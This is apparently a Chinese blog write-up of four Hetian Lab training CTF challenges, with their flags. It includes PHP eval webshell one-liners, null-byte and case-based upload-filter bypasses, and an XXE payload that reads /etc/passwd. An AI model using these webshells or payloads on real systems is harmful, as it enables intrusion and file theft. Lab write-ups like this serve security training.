文章目录

  • 第七周 | 再见上传
  • 第八周 | 随意的上传
  • 第十三周 | simple xxe
  • 第十五周 | 回显的SSRF

第七周 | 再见上传

<?php @eval($_POST['g']);?>做一个木马,发现只是上传png格式,但是dir也被post了,可以修改dir来拼接文件名,加上%00阶段(%00需要urldecode)


flag{asdf_hetianlab_com}

第八周 | 随意的上传


<script language="Php">eval($_REQUEST[1])</script>
<?和php都被过滤替换了,php可以大写绕过Php


flag{0123_4567_8901}

第十三周 | simple xxe

可以用file协议读文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///etc/passwd">]>
<user><username>&admin;</username><password>123456</password></user>

注释里面有提示



flag{hetianlab_ctf}

第十五周 | 回显的SSRF

File协议读文件

flag{enter_your_passwd}

合天网安 在线实验 CTF竞赛 writeup(第七周 | 再见上传、第八周 | 随意的上传、第十三周 | simple xxe、第十五周 | 回显的SSRF)相关推荐

  1. 合天网安 在线实验 CTF竞赛 writeup(第六周 | 套娃一样的上传、第二十一周 | 你的空格哪去了、第十周 | 试试协议吧、第十一周 | 签到般的包含、第九周 | 试下phpinfo吧)

    文章目录 第六周 | 套娃一样的上传 第二十一周 | 你的空格哪去了 第十周 | 试试协议吧 第十一周 | 签到般的包含 第九周 | 试下phpinfo吧 第六周 | 套娃一样的上传 图片上传题目,看 ...

  2. 合天网安weekly系列ctf实战 | 第八周 | 随意的上传wp

    第八周 | 随意的上传 打开题目 看到题目首先想到的是上传一句话木马用菜刀连接 写入一句话木马上传成功,但有字符被过滤 尝试使用js绕过 上传成功 连接上菜刀,根据提示在/var/www/html目录 ...

  3. BurpSuite实战——合天网安实验室学习笔记

    burpsuite是一款功能强大的用于攻击web应用程序的集成平台,通常在服务器和客户端之间充当一个双向代理,用于截获通信过程中的数据包,对于截获到的包可以人为的进行修改和重放. 此BurpSuite ...

  4. 合天网安 CTF之第六周-套娃一样的上传

    合天网安 CTF之第六周-套娃一样的上传 一.实验目的 本实验无writeup,需要同学们发挥自己所学,拿下最终目标 二.实验环境 目标机:Centos7 IP地址:10.1.1.147:5006 攻 ...

  5. 合天网安就业班_CTF挑战赛-合天网安实验室

    [TOCCTF挑战赛-合天网安实验室逆向解析] CTF挑战赛-合天网安实验室​sourl.cn 1.逆向100 修改后缀为.apk 安卓模拟器打开,发现要求输入Password 用Android逆向助 ...

  6. 合天网安实验室CTF-Steg150-一段欢快的曲调

    合天网安实验室CTF-Steg150-一段欢快的曲调 题目描述   滴滴 相关附件   stego100.wav 题目链接 参考解题步骤 1.下载的附件是一段wav格式的音频,打开听了一下,确实是欢快 ...

  7. 【合天网安】FCKeditor 2.4.3文件上传漏洞

    [合天网安实验室]FCKeditor 2.4.3文件上传漏洞 编辑器漏洞 常见的文本编辑器有FCKeditor.Ewebeditor.UEditor.KindEditor.XHeditor等,它们包含 ...

  8. 合天网安实验室CTF-基础50-0x01

    合天网安实验室CTF-基础50-0x01 最近无聊时准备刷点题,由简到难慢慢来吧 题目描述   真的不能再简单了! 相关附件   misc50.zip 题目链接 参考解题步骤 1.下载下来的压缩包解压 ...

  9. 合天网安实验室CTF-Web100-Give Me Flag

    合天网安实验室CTF-Web100-Give Me Flag 题目描述   哎,不小心把代码弄乱惹 相关附件   web100.zip 题目链接 参考解题步骤 1.下载附件打开后是一段JavaScri ...

最新文章

  1. 当前人工智能技术都在哪些领域有应用
  2. Unity游戏开发技巧集锦2.1.3实现效果
  3. 在当当买了python怎么下载源代码-爬虫实战:爬取当当网所有 Python 书籍
  4. C语言预定义宏 __func__、__FUNCTION__、__LINE__、__FILE__、__DATE__、__TIME__
  5. 剑与远征英雄兑换码如此少见,新玩家连抽获得数位英雄
  6. JAVA程序测试时用到的与内存测试有关的东西
  7. c语言 如何创建adt_编程那些事儿:面向对象编程基石之数据抽象(ADT)
  8. idiom的学习笔记(一)、三栏布局
  9. n的阶乘程序python_Python程序对N阶乘的尾随零进行计数
  10. 实现 npm script 跨平台兼容
  11. android 进度条图标方形_Android - 条纹进度条实现,调整view宽度仿进度条
  12. linux 7 打开22端口号,Centos 7 修改 SSH 默认端口号
  13. pyspark对Mysql数据库进行读写
  14. NVIDIA 控制面板闪退问题解决
  15. chrome官网下载win64离线安装包
  16. 番薯借阅--图书管理系统(小程序)
  17. Mysql从入门到入魔——6. 表联结、组合查询
  18. 【高通SDM660平台 Android 10.0】(21) --- 高通Camera persist使用手册
  19. 以太网物理层信号测试与分析
  20. The C Programming Language 读书总结

热门文章

  1. ES2022(ES13)简介
  2. 微信小程序iOS视频播放开始黑屏问题
  3. EXCEL分页预览 网格线
  4. NFS(网络文件系统)简介及搭建
  5. java架构师视频,附源代码
  6. 医学图像的一些预处理知识
  7. Linux文本编辑工具
  8. 朱清时的10本推荐书
  9. MySQL 数据库--存储引擎
  10. 基于Redis+MySQL+MongoDB存储架构应用